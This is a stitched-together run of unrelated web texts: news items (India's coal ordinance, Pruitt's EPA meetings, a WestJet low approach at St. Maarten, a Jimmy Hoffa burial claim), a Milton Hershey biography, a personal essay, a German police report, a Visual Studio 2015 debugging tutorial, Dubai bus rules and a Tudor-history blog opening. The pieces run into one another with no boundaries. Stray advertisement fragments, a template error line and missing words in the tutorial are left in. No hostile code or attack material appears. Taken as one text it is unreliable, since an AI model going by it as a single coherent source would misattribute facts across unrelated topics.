Wilpon bought a stake in the Mets in 1980 , raised his share to 50 percent six years later , and purchased the rest with his family and others in 2002 .
The case is In re Securities Investor Protection Corp. vs. Bernard L. Madoff Investment Securities LLC , U.S. Bankruptcy Court , Southern District of New York , No . 08-01789 .
NEW DELHI : The government on Monday allowed private companies in power , cement and steel to get their own coal mines through e-auctions , thus clearing the logjam created by the Supreme Court order annulling all allocation of captive mines since 1993.This makes the process through which end-users of coal can acquire a steady and assured supply of coal more transparent , but does not amount to denationalization of the sector . Some experts said this was a “ half-hearted ” move to reform the coal industry which has proved a bottleneck for the infrastructure industries . Government sources , however , said that this is just a beginning and much more is to come.The move came in the form of an ordinance which was okayed by the Cabinet Committee on Economic Affairs . Announcing the decision , finance minister Arun Jaitley said the government had recommended to the President promulgation of the ordinance.While the ordinance primarily aims to make possible auctioning of the cancelled coal blocks , it would have an enabling provision for commercial coal mining by private companies “ in future ” – when in the future , however , was left unsaid.Jaitley emphasized this was not the beginning of denationalization of coal mining and state-run Coal India 's turf would be protected . Power minister Piyush Goyal added his bit by saying the national miner 's interests would be “ fully ” protected . This assurance would allow Coal India to fetch a good valuation when it goes to the market for divestment . “ The original Nationalisation Act remains and will remain and Coal India Ltd will be fully protected , ” Jaitley said.Coal mining was nationalized in the early 1970s and private mining is allowed only for captive use by power , steel and cement plants.The ordinance would allow the government to take over the cancelled mines . First , blocks would be allotted to government entities such as NTPC , state electricity boards and mining companies of state governments . This would protect the interest of electricity consumers.For private companies , the blocks would be put in a central pool for bidding through an e-auction . The first round of the auction would be completed in the next three-four months , which is well within the six-month deadline set by the Supreme Court to stop production from the cancelled mines.The entire proceeds from the auction would go to the states where these mines are located . “ This will financially empower the eastern states in particular ( which have most of the coal mines ) and lakhs of labourers would get employment , while bank capital held up with the allottee companies would be fruitfully utilised , ” the finance minister said.The biggest beneficiaries would be states like Chhattisgarh , West Bengal , Jharkhand and Odisha . Madhya Pradesh , Maharashtra and Andhra Pradesh would also benefit. “ The entire mess that the UPA had left behind from 2005 onwards over the next four months would be cleaned up , ” Jaitley said , adding coal worth $ 20 billion , which was being imported annually , would be domestically substituted through this measure .
American manufacturer and philanthropist who founded the Hershey Chocolate Corporation and popularized chocolate candy throughout much of the world .
Who Is Milton Hershey ? Milton Hershey was born on September 13 , 1857 , in Derry Township , Pennsylvania , although some sources say he was born in Derry Church , Pennsylvania . Following an incomplete rural school education , Hershey was apprenticed at age 15 . After two failed attempts , Hershey set up the Lancaster Caramel Co . In 1900 Hershey sold the company , focused on perfecting the formula for chocolate bars , and began building at the site that became the world 's largest chocolate manufacturing plant .
Early Years Entrepreneur Milton Snavely Hershey was born on September 13 , 1857 , in Derry Township , Pennsylvania . He was the only surviving child of Veronica `` Fanny '' Snavely and Henry Hershey . Born on a farm outside of Derry Church , Pennsylvania—a small farming community in the central part of the state—Hershey spent the early years of his childhood trailing his father , a dreamer who always had his eye out for the next big opportunity . But Henry Hershey lacked the perseverance and work ethic to stick anything out . ADVERTISEMENT Thanks for watching ! Visit Website By 1867 , Hershey 's father had largely cut himself out of the family picture . The details around his parents ' separation are cloudy , but it 's largely believed that Fanny , the daughter of a Mennonite clergyman , had grown tired of her husband 's failures . ADVERTISEMENT Thanks for watching ! Visit Website ADVERTISEMENT Thanks for watching ! Visit Website With Hershey 's upbringing left to her , the strict Fanny instilled in her son an appreciation for hard work . At the age of 14 , Hershey , who 'd dropped out of school the year before , expressed an interest in candy making and began apprenticing with a master confectioner in Lancaster , Pennsylvania . Four years later , Hershey borrowed $ 150 from his aunt and set up his own candy shop in the heart of Philadelphia .
Early Ventures For five long years Hershey poured his sweat and time into the business . But success eluded him . Finally , he closed shop and headed west , reuniting with his father in Denver , where he found work with a confectioner . It was there that he discovered caramel and how fresh milk could be used to make it . But the entrepreneur in Hershey was n't content to work for someone else , and he struck out on his own again , first in Chicago and later in New York City . In both cases , Hershey again failed . In 1883 , he returned to Lancaster and , still convinced he could build a successful candy company , started the Lancaster Caramel Company . Success soon followed . Within a few short years , Hershey had a thriving business and was shipping his caramels all over the country .
The Chocolate King At the World 's Columbian Exposition in Chicago in 1893 , Hershey got an up-close look at the art of chocolate making . He was immediately hooked . While his caramel business boomed , Hershey started the Hershey Chocolate Company . His fascination quickly became focused on milk chocolate , considered a delicacy and largely the domain of the Swiss . Hershey was determined to find a new formula that would allow him to mass-produce and mass-distribute milk chocolate candy . In 1900 he sold the Lancaster Caramel Company for an astonishing $ 1 million . Three years later he began building a mammoth and modern candy-making facility in Derry Church . It opened in 1905 , setting a new course for Hershey and the candy industry .
Man of the People Quickly , the Hershey Chocolate Company 's success far exceeded that of its founder 's previous venture . His winning ideas included the Hershey Kiss in 1907 , which the company 's founder named himself . The trademark foil wrapper was added in 1924 . As the company grew and Hershey 's wealth expanded , so did his vision for creating a model community in his home region . In the town that came to be known as Hershey , Pennsylvania , Hershey built schools , parks , churches , recreational facilities and housing for his employees . He even added a trolley system for his workers . At his side for much of this philanthropy was his wife , Catherine , whom he 'd married in 1898 . Unable to have children of their own , the Hersheys focused a good portion of their giving on endeavors that affected kids . In 1909 the couple opened the Hershey Industrial School , a facility for orphaned boys . It has since become a landing spot for girls as well and is now known as the Milton Hershey School . In 1918 , three years after Catherine 's unexpected death , Hershey transferred much of his wealth , which included his ownership of the Hershey Chocolate Company , to the Hershey Trust , which funds the Hershey School . Hershey 's philanthropy kept going even when the economy struggled and he was nearing the end of his life . In the 1930s , during the Great Depression , Hershey ignited a building mini-boom in his town in order to keep men working . He ordered the construction of a large hotel , a community building and new offices for the Hershey Company . During World War II , Hershey backed the country 's military efforts by supplying forces with chocolate bars called the Ration D Bar and the better-tasting Tropical Chocolate Bar . To those who knew Hershey , his generosity was n't surprising . Shy and reserved , Hershey 's quiet demeanor contrasted greatly with many of America 's other business titans . While he seldom wrote or read , and had been forced to leave school early , Hershey was driven to make sure those around him received a great education . His display of wealth was rather modest , if not downright thrifty . His house and the community he 'd helped create meant everything to him . When it came to building his own home , he made sure the Hershey Company headquarters was part of the view .
Final Years Following his wife Catherine 's death , Hershey never remarried and supposedly carried a picture of his late wife wherever he traveled . In keeping with the work ethic his mother instilled in him , Hershey continued to work well into his 80s . He died in Hershey , Pennsylvania , on October 13 , 1945 . His legacy as a businessman and philanthropist continues to this day . The Hershey Chocolate Company has endured as one of the world 's great candy makers , with brands that include Almond Joy , Mounds , Cadbury , Reese 's and Twizzlers . Just as impressive , the Milton Hershey School now serves about 1,900 students each year , while the M.S . Hershey Foundation , which Hershey established in 1935 , funds educational and cultural activities for Hershey residents .
Shedding My Skin
At my wedding in 1989 I took a silly picture . Or , rather , posed for one . On that gorgeous day , my husband and I were tired of being beautiful and our faces hurt and my mother stuck a camera in our faces so we both made hideous monster faces , instead . ( I 'm really good at making hideous monster faces . ) My mother laughed and snapped the picture , but other family members standing nearby were horrified and asked how we could do such a thing on that day of all days . I put my mother 's pictures from that day in an album , including the monster-face one .
Several years later , I was looking through that album , and I came across the monster-face picture . The disappointment in my family members voices reached out to me once again through the years , and I burned with shame . What was I thinking ? How could I do such a thing ? I took the picture out of the album and destroyed it . Now I would only have pictures of me being beautiful on that day .
My wedding day was very special , and I loved being beautiful for that day . Partly because it felt like I was being accepted in a way that was n't usually the case . I grew up as “ the smart one ” in a family that placed a high premium on being attractive . I 've been defined as overweight all my life and was informed , in ways both direct and subtle , by family members and by society at large , that the way I looked was n't acceptable . Like so many other girls and women , I internalized that message and carried it around with me , pining for that moment when I would be beautiful and thus adored by the world . The wedding day felt like that . For a day .
You know those “ before and after ” diet pictures ? I spent a great deal of my life feeling like a “ before ” picture . The problem with feeling like a “ before ” picture is that you keep focusing on the “ after ” . But what if “ after ” never quite appears like you want it to ?
Last week I had an amazing experience . It was a “ therapeutic photography ” session with Natasha Komoda . She calls her work Femmeography , and explains that it 's about “ photographing girls and women in order to capture their true selves and empower them to honor and see both their inner and outer beauty . ”
“ Oh , like boudoir photography ? ” I asked Natasha when she first explained it to me . I 'd always harbored a fantasy of having a boudoir session done . You know , after I lost weight .
“ Not exactly , ” she said .
She told me she was looking for a writer to experience a session and to write about it . She knew I was a writer , and she cocked an eyebrow at me .
My chest tightened .
There 's a quote that says :
“ Everything you want is on the other side of fear . ”
I want to feel beautiful . I want to be seen for who I really am . I want to feel like an “ after ” picture . And the fear is that I 'm not good enough . That I do n't “ qualify ” for those perks .
“ I 'll do it , ” I said .
“ Great ! ” Natasha beamed , and scheduled me for three weeks out .
The internal monologue started almost immediately . HOLY CRAP ! What did I just agree to ? I 'm the heaviest I 've ever been in my life . What will I wear ? Oh my God , I 'd better start dieting this instant .
But I did n't diet . Dieting is too hard and no fun and ultimately detrimental and I hate it . I kept on living my life in the way that it has evolved to make me happy .
The day arrived .
I was nervous on the trip there . Not panicked , because I had made the decision to do this and I wanted to do it . But I did feel very … fluttery .
“ Everything I want is on the other side of fear , ” I said aloud as I pulled up to the studio .
This was n't about getting my picture taken . I 've had my picture taken plenty of times , and I know how good makeup , styling , proper lighting and retouching can make me look more polished and socially acceptable . But this was n't about going for an ideal . It was traditional portraiture turned on its head . It was about photographing me just as I am .
This was n't about getting my picture taken . It was about facing my fear . About being good enough – qualified – to merit having someone take pictures of me without posing . Without special lighting . Without retouching .
I would n't be physically nude , but emotionally I would definitely be .
Natasha welcomed me warmly and we sat and chatted for a bit . Then she plugged in my soundtrack .
She asks that you create a soundtrack for the session . Music that inspires you to move .
I had gone through my list and picked songs that I knew inspired me to move , and had n't really given it much more thought than that . But as I was actually listening to them and moving and chatting with Natasha and being photographed , the titles made me laugh out loud :
Thank You ( Falettinme Be Mice Elf Agin ) – Sly & The Family Stone
Who Are You ? – The Who
Carry On – Alana Davis
I Think I See the Light – Yusuf Islam
Ca n't You Hear Me Knocking – The Rolling Stones
Oh , subconscious . You 're hilarious !
The session itself was as lovely as I could have hoped . We chatted , joked , and told stories the whole time . It was a conversation . I soon forgot the camera was even there . I felt relaxed . Trusted . Appreciated . Seen .
After what might have been about 30 – 40 minutes , we were done . I drank some water and gathered my things while Natasha tended to a bit of paperwork and explained when I 'd get my pictures .
I told Natasha I felt a little shaky .
“ You had a lot of emotion to let out and it came out , ” said Natasha . “ Take good care of yourself for the next few days . ”
I drove home in silence . That night , I wrote down the following :
I feel like I just molted . I left something behind in Natasha 's studio . I 've shed an old skin that does n't fit me anymore .
Then I put the whole experience in the compost pile . That 's what I call it when I need to process something emotionally or intellectually . I walk away from it and it taps me on the shoulder when it 's ready to come out .
Three days later , my pictures arrived . I was nervous to open the file . The experience had been so lovely , I was afraid I 'd see the pictures and that , like so many times before , I 'd be disappointed that what I saw in the picture did n't jibe with what I felt about myself inside .
The pictures were lovely .
Sunny . Angry . Funny . Sexy . Fat . Tragic . She had seen me . I was seeing me . This was me shedding my skin . No wonder I was exhausted afterward .
It 's now eleven days later . I no longer feel as raw . Here 's what I can report :
My new skin is happier to take up space . It 's more interested in what it feels about itself than what others think about it . It is just as willing to look ugly as it is to look beautiful , as it has learned that they are not mutually exclusive concepts . It forgives itself for past transgressions … and for future ones , too .
Oh , and it really , really likes to move .
I 've kicked the habit
Shed my skin
This is the new stuff
I go dancing in .
– Peter Gabriel
Like this : Like Loading ...
Pirna
Eskalation einer Auseinandersetzung am Sonnabendnachmittag auf dem Parkplatz des Kaufland-Einkaufsmarktes auf dem Pirnaer Sonnenstein : Ein 58 Jahre alter Mann aus Afghanistan fuchtelte mit einem Messer mit etwa 30 Zentimeter langer Klinge und stach mindestens drei Mal nach einem 27 Jahre alten Pirnaer . Der Mann konnte sich den Angreifer vom Leib halten und den Attacken jeweils ausweichen . Seine 25-jährige Lebensgefährtin und deren vierjähriger Sohn mussten den Messerangriff miterleben .
Grund für die Gewalteskalation : Die Männer waren im Markt aneinander geraten . Der 27-Jährige wollte beobachtet haben , wie der Afghane des vierjährige Kind berührt hat . Der Stiefvater soll den 58-Jährigen aufgefordert haben , schnell das Weite zu suchen . Daraufhin soll der Afghane den Markt verlassen , aber sich vom Verkäufer des Döner-Imbisswagens auf dem Parkplatz ein Messer geborgt haben .
Als die Familie mit Kind mit ihren Einkäufen zum Auto gegangen war , sei der Afghane mit dem Messer in der Hand gefolgt und habe den 27-Jährigen angegriffen . Der Dönerverkäufer soll die Lage dann deeskaliert haben , indem er dem 58-Jährigen das Messer aus der Hand riss . „ Sein Einschreiten hat die Situation entschärft “ , berichtete ein Augenzeuge . „ Er kann nicht mit meinem Messer anderen Leuten etwas antun “ , erklärte der mutige Döner-Verkäufer . Der 58-Jährige habe ihn unter einem Vorwand um das Messer gebeten . „ Wir geben keine Messer mehr heraus . Zum Glück ist nichts passiert “ , so der 40-jährige türkische Staatsangehörige .
Der Afghane flüchtete in eine nahegelegene Gartenanlage , wo er von alarmierten Polizeikräften gestellt wurde . Er soll stark alkoholisiert gewesen sein , ein Atemalkoholtest habe 1,3 Promille ergeben . Der Mann wurde zur Blutentnahme ins Krankenhaus gebracht und dann wieder auf freien Fuß gesetzt . Nach zwei Stunden kehrte der 58-Jährige auf den Sonnenstein zurück . Die Polizei ermittelt wegen versuchter gefährlicher Körperverletzung und Bedrohung , bestätigte am Sonntag ein Polizeisprecher .
Von Daniel Förster
Scope
This article demonstrates the improvements in Visual Studio 2015 on the new tools that makes the debugging process easier .
IntelliTrace
IntelliTrace can be used to record events and method calls to your application that allows you to examine its state ( call stack and local variable values ) at various points of the execution .
In Visual Studio 2015 , the presentation of IntelliTrace has improved considerably . You can view IntelliTrace events just as you start debugging and also now you can view a timeline of all events in your application just as you break all the events .
Historical Debugging
Historical Debugging allows you to view the state of your application when the code executes .
To activate historical debugging , double-click on the Diamond icon in the events windows .
New Exception Settings Window
In previous versions of Visual Studio , when you wanted to configure exception settings you would need to go to the modal , slow-opening , hard-to-search Exceptions Dialog .
Press Ctrl + Alt + E to open the Exception Settings Window in the previous versions of Visual Studio .
In
, it 's just at the bottom-right menu , go to the “ Exception Settings ” tab that opens instantaneously compared with the previous Visual Studio versions .
You can use the
to specify which exceptions ( or sets of exceptions ) will cause the debugger to
and at which point you want it to break . You can add or delete exceptions , or specify exceptions to `` break '' on .
This feature is really handy in applications where all exceptions are caught that makes it difficult to identify which piece of code is causing the error . Thus , by selecting the appropriate exception in the Exceptions Window , this can make the application break and therefore identify which code is causing the error straight away .
Breakpoint Configuration
If you use Visual Studio to develop code , the chances are good that you set breakpoints on a regular basis as part of debugging .
In Visual Studio 2015 , it is now easier to find , use and configure breakpoints associated with a specific line of source code .
The first noticeable change is that when hovering on a breakpoint , there is now a small menu that allows you to open the new breakpoint window and a toggle button that allows you to turn a breakpoint on/off .
Breakpoint Settings The Breakpoint settings shows the following two categories :
Conditions : Control when the breakpoint is hit . When to break in the code .
Control when the breakpoint is hit . When to break in the code . Actions : Control what happens when all of the breakpoint conditions are satisfied .
Conditions
There are the following 3 conditions that can be used to allow the code to break :
Conditional Expression : Break only when conditions you specify are met .
Hit Count : Break only after the breakpoint has been hit a certain number of times .
Filter : Break when the breakpoint is hit on a specific thread , process , or machine and are useful for debugging code running in parallel .
Debugging in a loop .
for ( int i = 0 ; i < 5 ; i++ ) { Console.WriteLine ( `` Do Stuff '' ) ; }
Assume that you need to debug only when I = 2 . In this scenario , Hit Count can be used as in the following image :
The preceding condition will make the code break only after it has been executed 3 times , thus , at I = 2 .
Actions
Actions print a message to the output window and are capable of automatically resuming execution . These are useful for doing temporary logging when you need to trace something and do n't want to have to break and manually track values .
Let 's say the name of the person and its occupation needs to be logged only when MaritalStatus is 2 .
clubMemberModel.Id = 0 ; clubMemberModel.Name = txtName.Text.Trim ( ) ; clubMemberModel.DateOfBirth = dtDateOfBirth.Value ; clubMemberModel.Occupation = ( int ) cmbOccupation.SelectedValue ; clubMemberModel.HealthStatus = ( int ) cmbHealthStatus.SelectedValue ; clubMemberModel.MaritalStatus = ( int ) cmbMaritalStatus.SelectedValue ; clubMemberModel.Salary = txtSalary.Text.Trim ( ) ;
Breakpoints can be configured as in the image below .
Notice that the checkbox
is checked to allow the application to resume automatically after the logging I completed .
Also , to access variables when logging the messages , they should be written between { } .
Performance Tools
The new set of diagnostics tools are great in helping solve performance issues . The new tools include PerfTips , Memory and CPU usage monitoring .
PerfTips
When debugging , you can view the amount of time each line of code takes to execute . This helps considerably when troubleshooting performance issues and doing optimizations .
The diagnostics not only allows you to monitor events on your application , it also allows you to monitor the CPU and memory usage .
A cool thing is that you can also go into your code line-by-line and view the memory/CPU usage as each line of code executes .
Monitor Change in Memory Usage
One of the new features is the ability to view the memory usage on a timeline in the diagnostics window when debugging .
But you can also compare the memory usage at 2 points in time using snapshots .
To take a snapshot , go to the Memory Usage tap and click on “ take snapshot ” .
This will show the time the snapshot was taken , the number of objects in memory and also the Heap Size , then you can take another snapshot at a different point of time . For example , after a method that you suspect is using a lot of memory .
The second snapshot was taken after 0.68 seconds and an increase in memory usage is noted .
To view the objects that are in memory , click on the number of increased objects to the left of the Red arrow .
This will show you the count difference of each object in memory and also their difference in size . From here you may also go to the definition of each object to try to identify what is exactly causing the memory leak .
Advanced Diagnostics To use more diagnostics tools , click on Debug > Start Diagnostics Tools without Debugging .
From here , there is a wider range of tools that can be used , such as CPU and GPU monitoring . Select the one that you need and click on Start .
Once you click on Start , use the application and Visual Studio will record all the necessary information that it needs .
Once you are done , click on Stop and Visual Studio will generate a report of all the events that occurred and the amount of CPU that each of them used .
See Also
References
IntelliTrace showing a list of all events and at which time they occurred.The debugger events present all the events that occurred in the application using a timeline.Continue executionBlog Post : Presentation for the Visual Studio 2015 launch in Mauritius
Typically , esports stages do n't get much more elaborate than a big screen , some colorful lights , and maybe a smoke machine for effect . Over the weekend , Republic Of Gamers decided to one-up everybody with a “ stage ” suspended from vertigo-inducing heights .
As part of its “ Extreme Gaming ” event ( via PCGamesN ) , ROG hosted a Counter-Strike exhibition match between German team Penta and Czech team eXtatus that took place roughly 30 feet in the air . While none of the players spoke English , you can get a good idea about how many of them were feeling based on facial expressions alone :
I know that face well . It 's the one people make when they get on roller coasters and then realize they do n't even like roller coasters , and oh jeez here comes the first drop , fuck this .
Helpfully , a Redditor translated a conversation between two commentators as the crane hoisted the platform into the air :
Commentator 1 : “ Hey , hey this is really not good . I want to go down. ” Commentator 2 : “ Higher . Higher ! ” Commentator 1 : “ Shut up ! I need to hold on to something but there is nothing I can grab here ! ” Commentator 2 : “ Well at this point I hope we are just a quarter way up . They could get us higher. ” Commentator 1 : “ Hey you are a ... Shut up ! You are not helping ! ”
In the end , eXtatus won pretty decisively , proving that they were less unsettled by the uncaring forces of gravity and ground leering over their shoulders . And while it was merely an exhibition match , now everybody involved can say they did it , handily answering the question of “ why ? ” with the ever-reliable “ why not ? ”
Philip Ng will portray Bruce Lee in martial arts action movie “ Birth of the Dragon , ” with shooting commencing Tuesday in Vancouver .
Yu Xia will play Shaolin Master Wong Jack Man and Billy Magnussen will portray martial arts student Steve McKee . Jinging Qu plays the love interest of McKee 's character and Jin Xing will portray a crime boss . George Nolfi is directing from a script by Christopher Wilkinson and Stephen J. Rivele , who have writing credits on “ Ali ” and “ Nixon . ”
Groundswell Productions is producing the movie . Variety reported last year that Nolfi had become attached as the director .
The film recreates the mid-1960 's fight between Lee and Wong Jack Man from the point of view of McKee . After the fight , Lee reinvented himself and his style of kung fu . Action sequences will be designed by martial arts choreographer Corey Yuen , whose credits include “ Lethal Weapon 4 , ” “ X-Men , ” “ Romeo Must Die ” and “ The Expendables . ”
Lee began appearing in films in the early 1970s before passing away in 1973 . Wong remained silent about the fight for many years and retired from teaching martial arts in 2005 after 45 years .
Related 'Deadpool 2 ' Director David Leitch in Talks for 'Enter the Dragon ' Remake How Bruce Lee 's Star Rose in the U.S. After His Death
“ 'Birth of the Dragon ' is a rare opportunity to make an action film with rich characters based on real events and real people , ” Nolfi said . “ It 's a story about people from the East and West transcending their differences to work together , which is obviously a very timely story . ”
“ Birth of the Dragon ” is financed by Kylin Films . Producers are Michael London and his producing partner Janice Williams , along with Wilkinson , Rivele and Kylin 's James H. Pang . Leo Shi Young , David Nicksay and Nolfi are executive producers , and Helen Y. Zhong , Jaeson Ma and Joel Viertel are co-producers .
“ We 're thrilled to be telling one of the great untold stories in martial arts history , especially at this unique moment when China and Western audiences are opening up to each other as never before , ” said London . “ To work with a Chinese film company like Kylin on a story that has so much significance in China has been a wonderful collaboration , and , we hope , the first of many . ”
Kylin was represented in the financing transaction by Ed Labowitz of Alexander , Lawrence , Frumes & Labowitz , LLP , and Groundswell by David Boyle .
Washington ( CNN )
Scott Pruitt has made no secret of his interest in shaking things up at the EPA . The former Oklahoma attorney general spent years during the Obama administration challenging its regulations .
Now working as administrator of the very same agency , he 's rolled back rules given more of a voice to industry players , meeting with them far more than environmental groups .
Of all of the meetings Pruitt has held in person or on the phone , the majority have been with fossil fuel industry stakeholders . He 's held more than 100 meetings with industry representatives , about 25 % of meetings overall , according to a recently public copy of his schedule from April to early September . In comparison , he 's held five meetings with environmentalist or science groups , which is less than 1 % .
The top groups granted Pruitt 's personal ear are industry , staff members , elected officials , media interviews and speaking engagements . Environmental groups are in 10th place for frequency of meetings with the head of environmental protection .
Breaking down Pruitt 's meetings with each sector , energy groups are at the top of the list . He 's met with representatives of oil , gas , electric , biofuel and other such companies almost 35 times . The next most penciled-in groups is farmers , ranchers and agriculturalists . A large part of the EPA 's job is regulating chemicals and fertilizers .
Air travelers to St. Maarten expect a thrilling view approaching Princess Juliana International Airport . But thrills turned terrifying for passengers and observers of WestJet Flight 2652 from Toronto on Tuesday .
When the Boeing 737 descended through the clouds it went well below the minimum descent altitude . The scene of the jet skimming the surface of Maho Bay was captured by aviation photographer Christine Garner , shooting from the roof of a nearby building . She said she thought the plane was going to crash .
“ When this plane came out of the cloud , I was so shocked , ” she said . “ The surprising thing was he was lower than me . Normally they pass at my height or slightly above . For once I actually thought he was going to crash into the ocean . ”
The pilots on the plane with Disney 's Frozen livery , executed a go-around and it landed about 45 minutes later .
“ According to the information I have been given there was nothing unusual about the first approach , ” said Lauren Stewart , a spokeswoman for the Calgary-based carrier . Citing FlightAware logs , Stewart said the plane was never lower than 500 feet before the go-around . But professional pilots confirm Garner 's observation that the plane was much closer to the water and I have been told that FlightAware does not have coverage to the ground at SXM .
“ I 'll put money on the fact that jet was at 50 feet , ” a 737 captain who flies the same aircraft for another U.S. airline told me . “ To be that low and not over the runway is downright dangerous. ” he said . A captain at an international airline with 20,000 flight hours , who also saw the photo concurred . “ It 's quite apparent that aircraft is within half a wingspan of the water . You can tell by the jet blast trail in the water , the yellow buoy in the water , and the white little building on the cliff . ”
Both pilots referenced recent landing disasters , the 2013 crash of a Lion Air 737 in Bali , Indonesia in which investigators say the plane was below the minimum descent altitude when it hit the water half mile short of the runway . No one was killed .
Later that same year , an Airbus A300 UPS cargo plane crashed 3,300 feet short of the runway in Alabama , at Birmingham–Shuttlesworth International Airport . The captain and first officer who were the only people on the airplane , were killed .
Kyle St. Hilaire , a passenger on the flight , described the first approach saying , “ It was a normal flight , and then a normal descent , but we came into rain clouds during the end of it. ” St. Hilaire had been reading a book but when he looked out the window at the clearing sky , he said the plane was “ way too close to the water .
“ I felt a violent acceleration and an aggressive pitch up , felt like a roller coaster and I 've grown up on planes. ” St. Hilaire reported the plane banked to the right and “ during the whole rapid ascent nobody on the plane said much , but it was tense . ”
The second approach 45 minutes later came in much higher and for the passengers and crew of WestJet Flight 2652 , the flight had a happy ending .
As my 737 captain helping me with this story reminded me , its a good thing someone in the cockpit spoke up , because at 50 to 100 feet , if the plane was in a 700 foot per minute descent , “ those folks were seconds away from crashing . ”
Folks knowledgeable about safety are quick to say that pilots must remember ; go-arounds are nothing to be ashamed of . Resisting a missed approach will more likely end in tears .
WestJet declined to answer questions about what kind of special training or airport-specific qualifications are required for pilots flying into Princess Juliana Airport . Instead , Stewart told me the airline has had service into St. Maarten for seven years without incident .
WestJet 's statement about the plane 's altitude is n't supported by Christine Garner 's photo . To live up to its claims of safe operations the airline should examine what happened and look for the lessons . And it must acknowledge that its seven years of incident-free flying into St. Maarten , ended on Tuesday .
Profanity , name-calling and personal insults will not be tolerated in the comments section . They will be removed .
( Visited 287,270 times , 1 visits today )
Has one of America 's most enduring mysteries been solved ? Book claims Teamsters boss Jimmy Hoffa was buried in cement at General Motors ' HQ
The disappearance of Teamsters union boss Jimmy Hoffa remains one of America 's most enduring mysteries .
But now , nearly four decades after Hoffa vanished , his driver has claimed he knows where he is buried – and how he got there .
Marvin Elkind said Hoffa was killed by a mob enforcer and buried in the foundations of the towering General Motors ' HQ in Detroit , Michigan .
Mystery : Jimmy Hoffa , leader of the Teamsters labour union throughout the 1960s , went missing in 1975 . His driver has claimed he was killed by a mobster
Resting place ? Informant Marvin Elkind claims a mob boss insinuated Hoffa was buried at the Renaissance Center in Detroit , Michigan - now General Motors ' HQ
‘ It was his own people who did it , ' Mr Elkind said in excerpts of a new book published in the New York Post , adding Mafia member Tony Jack insinuated he was responsible .
The startling claim comes 36 years after Hoffa , who led the labour union for 13 years , vanished while on his way to meet two mobsters he knew well , Anthony Provenzano and Tony Jack – real name Anthony Giacalone .
The Renaissance Center was under construction when he disappeared .
Mr Elkind explains how , during a Teamsters conference in 1985 , he was among a group of men walking from the city 's Omni International when the Center came into view .
Tony Jack nodded toward the tower 's base and said , ‘ Say good morning to Jimmy Hoffa , boys ' , Mr Elkind alleges in The Weasel : A Double Life in the Mob by Adrian Humphreys .
He also describes the rush to build the Renaissance Center following the disappearance of Hoffa – and claims the body was buried in wet cement .
Informant : Marvin Elkind is the subject of The Weasel : A Double Life in the Mob . In the book , he claims he was told Hoffa had been buried in wet cement
‘ There was a mad rush to get the concrete poured , ' the New York Post quotes the book as saying .
Hoffa was declared legally dead July 30 , 1982 , when he would have been 69 .
Secrets : Elkind makes the claims in The Weasel : A Double Life in the Mob by Canadian journalist Adrian Humphreys
He was a union stalwart , serving as its General President from 1958 to 1971 and playing a key part in its growth and development .
During his term as its leader , membership surged to more than 1.5 million members , becoming the largest single union in the country .
As well as a role as Jimmy Hoffa 's driver , Mr Elkind had careers as a loan collector , a boxer - and a police informant .
He was working as a busboy in a Toronto restaurant frequented by Jimmy Hoffa 's crew when he was poached as a driver .
Mr Elkind initially said he did n't want the job , but he was told : 'Nobody 's asking you . '
He began testifying against the mob when police discovered he 'd worked with a con man . They gave him an ultimatum - tell or be charged .
The book , by Canadian reporter Adrian Humphreys , follows his life .
Pay a fine of Dh50 to Dh250 for breaking these rules .
Hundreds of thousands of people travel by Dubai public transport each day , but are they aware of all the rules ? Dubai buses run by the RTA are a cost-effective , convenient mode of transport throughout most parts of the emirate . If you take the bus every day , it is essential for you to know these rules to avoid getting penalised .
A random check by the RTA officer at the Noor Bank Metro station would have cost me Dh200 yesterday , had it not been for the presence of mind of a fellow passenger . My mistake was I was too close to the area marked red near the bus driver . Definitely , it was a narrow escape as my co-passenger pulled me behind when the officer walked in , but there are few things passengers need to be careful about during their bus trips .
Khaleej Times called the RTA helpline to know about common mistakes that passengers make while travelling in the bus :
1 . Avoid standing in the sections marked red and also near the side doors . You can be penalised for your own safety .
2 . Do n't just swipe and go inside the bus . Check the card reader for account balance to be sure .
3 . Do n't hold the Nol card for too long on the card reader . This might result in check-in and check-out at the same time .
4 . Although it might be tempting to check out before the bus halts at your destination to avoid the rush , resist that temptation . This is one of the most common mistakes made by passengers . Wait for the bus to halt and then proceed to check-out .
5 . Do not forget to check out , else the system will charge you more for the journey . Here 's how it works . When you check in , the system deducts the maximum amount of Dh7.50 if you are travelling inside Dubai . Even if the journey costs you Dh3 when you check in , the system will deduct Dh7.50 initially . When you check out , it will credit back Dh4.50 to your account . If you did n't check out , the journey will cost you Dh7.50 .
6 . Chewing gum or eating/drinking is strictly prohibited in the bus .
7 . Sleeping inside the bus is not allowed .
8 . Refusing to get down from the vehicle when asked by the driver or inspector due to overload , or because of disturbances caused to other passengers can attract a fine of Dh100 .
9 . Dh50 fine can be imposed in case of a passenger quarrels with somebody else .
10 . Failure to pay the due tariff or keep the ticket until the end of the trip can cost you Dh200 .
What to do when you do n't have money to pay the fine ?
1 . General offences will make you poorer by Dh50 to Dh250 if you are n't careful . If you do n't have money to pay the fine on the spot , the officer will confiscate your Emirates ID and will give you a receipt .
2 . You need to go after 48 hours to the public transport agency in Amman Street , Al Muhaisnah 4 Area , just to be sure that the Emirates ID is submitted to the office bearer . You can collect your Emirates ID after paying the fine .
3 . The payment should be after 48 hours and before 30 days . You need to appear personally and pay the fine . If you want to delay it more , you need to inform the office in order to avoid any escalation to the police department or immigration .
For any assistance or grievances , call the Dubai RTA assistance at 8009090
anita @ khaleejtimes.com
Share
More >
Vote
Click/tap here to subscribe to Khaleej Times news alerts on WhatsApp . Make sure you save the phone number under Contacts on your phone for uninterrupted service .
ERROR : Macro /ads/dfp-ad-article-new is missing !
I am delighted to host the second stop on the virtual blog tour to celebrate the UK publication of ‘ The Lives of Tudor Women ' by Elizabeth Norton .
You can buy it from :
Amazon.co.uk
Thank you to Elizabeth for this guest article .
Tudor Women and Religion
Henry VIII had little time for women who involved themselves prominently in religion , as the warrant of arrest drawn up for his sixth wife , Catherine Parr , in 1546 on a charge of heresy shows . He had previously been thwarted in his attempts to put Elizabeth Barton , the Nun of Kent , on trial for treason in 1533 , due to the fact that all the judges considered she could not possibly be found guilty : she had , after all , actually told the king to his face everything she was accused of disseminating .
